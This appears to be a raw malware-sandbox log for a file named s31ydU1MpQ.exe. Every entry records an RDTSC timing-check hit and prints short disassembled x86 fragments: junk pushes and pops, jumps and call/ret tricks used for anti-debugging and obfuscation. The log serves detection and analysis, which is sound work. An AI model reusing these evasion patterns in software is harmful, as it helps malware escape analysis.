Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7D758D second address: 7D7591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7D9D66 second address: 7D9E02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 19D5F9DFh 0x00000010 push 00000003h 0x00000012 mov edi, dword ptr [ebp+122D3950h] 0x00000018 push 00000000h 0x0000001a sub dword ptr [ebp+122D1CC3h], ecx 0x00000020 push 00000003h 0x00000022 mov dword ptr [ebp+1245338Dh], edx 0x00000028 push AA142277h 0x0000002d jmp 00007FCBAD522AABh 0x00000032 xor dword ptr [esp], 6A142277h 0x00000039 mov dword ptr [ebp+122D280Ch], esi 0x0000003f lea ebx, dword ptr [ebp+12455B88h] 0x00000045 push 00000000h 0x00000047 push ebx 0x00000048 call 00007FCBAD522AA8h 0x0000004d pop ebx 0x0000004e mov dword ptr [esp+04h], ebx 0x00000052 add dword ptr [esp+04h], 00000017h 0x0000005a inc ebx 0x0000005b push ebx 0x0000005c ret 0x0000005d pop ebx 0x0000005e ret 0x0000005f xchg eax, ebx 0x00000060 push edi 0x00000061 jmp 00007FCBAD522AB9h 0x00000066 pop edi 0x00000067 push eax 0x00000068 push edx 0x00000069 push esi 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7D9EAC second address: 7D9EB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7DA000 second address: 7DA004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7DA004 second address: 7DA00A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7DA00A second address: 7DA02E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d je 00007FCBAD522AA6h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7DA173 second address: 7DA177 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7D2886 second address: 7D2896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCBAD522AAAh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F85D9 second address: 7F85DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F875F second address: 7F8764 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F8764 second address: 7F876A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F8B80 second address: 7F8B84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F8B84 second address: 7F8BC1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCBACB2D116h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007FCBACB2D143h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F8BC1 second address: 7F8BCB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCBAD522AB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F8D4C second address: 7F8D5C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FCBACB2D11Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F8E90 second address: 7F8E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FCBAD522AA6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F8E9B second address: 7F8EA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F8EA2 second address: 7F8EC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FCBAD522AACh 0x0000000b popad 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f jns 00007FCBAD522AA6h 0x00000015 pop ecx 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F8EC6 second address: 7F8ECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F8ECC second address: 7F8ED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F8ED3 second address: 7F8EEE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FCBACB2D123h 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F91F5 second address: 7F920D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FCBAD522AAFh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F920D second address: 7F9211 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F9340 second address: 7F936A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FCBAD522AB8h 0x0000000b popad 0x0000000c jmp 00007FCBAD522AABh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F9495 second address: 7F949B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F949B second address: 7F94A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F94A3 second address: 7F94C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ebx 0x0000000a ja 00007FCBACB2D116h 0x00000010 pop ebx 0x00000011 popad 0x00000012 pushad 0x00000013 je 00007FCBACB2D11Eh 0x00000019 push edx 0x0000001a pop edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7EFEE3 second address: 7EFF07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007FCBAD522AB6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F97AF second address: 7F97BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F97BB second address: 7F97BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F97BF second address: 7F97D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FCBACB2D11Ch 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F97D7 second address: 7F97DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F9D51 second address: 7F9D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7F9EB6 second address: 7F9EBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7FA012 second address: 7FA016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7FA016 second address: 7FA01C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7FA485 second address: 7FA48F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7FECFB second address: 7FECFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7FECFF second address: 7FED05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7CD7A5 second address: 7CD7AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7CD7AA second address: 7CD7B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 802132 second address: 802137 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 802137 second address: 802149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FCBACB2D116h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80226E second address: 802272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 802272 second address: 802278 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 802278 second address: 80229E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCBAD522AB9h 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80229E second address: 8022B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FCBACB2D116h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007FCBACB2D116h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8022B1 second address: 8022B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 800952 second address: 800971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007FCBACB2D11Fh 0x0000000e jo 00007FCBACB2D116h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8023DA second address: 8023DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8023DE second address: 8023E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8023E4 second address: 802408 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCBAD522AADh 0x00000008 jc 00007FCBAD522AA6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 js 00007FCBAD522AA6h 0x0000001b pop ecx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 802408 second address: 802412 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FCBACB2D116h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 802412 second address: 80244B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 jmp 00007FCBAD522AAEh 0x00000015 jnp 00007FCBAD522AACh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80244B second address: 80245C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a jno 00007FCBACB2D116h 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80245C second address: 802463 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 806015 second address: 80601B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80601B second address: 806021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 806021 second address: 806056 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D11Fh 0x00000007 jnc 00007FCBACB2D12Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 806056 second address: 80606C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FCBAD522AA8h 0x0000000c jnp 00007FCBAD522AAEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8061A0 second address: 8061A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8061A6 second address: 8061B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007FCBAD522AA6h 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8061B5 second address: 8061BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80647A second address: 806493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBAD522AB3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 806493 second address: 806498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 806498 second address: 8064A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FCBAD522AA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 806764 second address: 806768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 806768 second address: 80676E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80676E second address: 806780 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007FCBACB2D116h 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 806A25 second address: 806A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 806A2B second address: 806A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 806A32 second address: 806A52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AB6h 0x00000007 jc 00007FCBAD522AACh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8099FE second address: 809A02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 809A02 second address: 809A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 809A08 second address: 809A0D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7C50BD second address: 7C50C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80A68B second address: 80A6A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBACB2D127h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80A6A6 second address: 80A6B9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCBAD522AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80A6B9 second address: 80A6D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D127h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80AA60 second address: 80AA64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80AA64 second address: 80AA6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80B029 second address: 80B02F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80D5CC second address: 80D5D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80EAB4 second address: 80EABA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80E841 second address: 80E846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80EABA second address: 80EB34 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCBAD522AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007FCBAD522AA8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 jo 00007FCBAD522ABAh 0x0000002f jo 00007FCBAD522AB4h 0x00000035 call 00007FCBAD522AADh 0x0000003a pop esi 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push eax 0x00000040 call 00007FCBAD522AA8h 0x00000045 pop eax 0x00000046 mov dword ptr [esp+04h], eax 0x0000004a add dword ptr [esp+04h], 0000001Bh 0x00000052 inc eax 0x00000053 push eax 0x00000054 ret 0x00000055 pop eax 0x00000056 ret 0x00000057 push 00000000h 0x00000059 mov esi, 4CC325E2h 0x0000005e xchg eax, ebx 0x0000005f push edi 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80EB34 second address: 80EB4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D11Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80F307 second address: 80F320 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80FFBC second address: 80FFDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D127h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80FD8E second address: 80FD93 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 80FD93 second address: 80FDAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b jmp 00007FCBACB2D11Fh 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 810B43 second address: 810B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
